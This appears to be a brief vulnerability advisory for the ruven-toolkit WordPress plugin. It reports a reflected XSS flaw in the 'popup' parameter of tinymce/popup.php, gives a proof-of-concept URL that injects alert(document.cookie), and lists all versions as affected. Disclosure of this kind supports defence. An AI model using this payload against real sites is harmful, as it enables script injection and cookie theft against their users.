The ruven-toolkit WordPress plugin was affected by a tinymce/popup.php popup Parameter Reflected XSS security vulnerability.
http://localhost/wp-content/plugins/ruven-toolkit/tinymce/popup.php?popup=popup’>alert(document.cookie)&
CPE | Name | Operator | Version |
---|---|---|---|
ruven-toolkit | eq | * |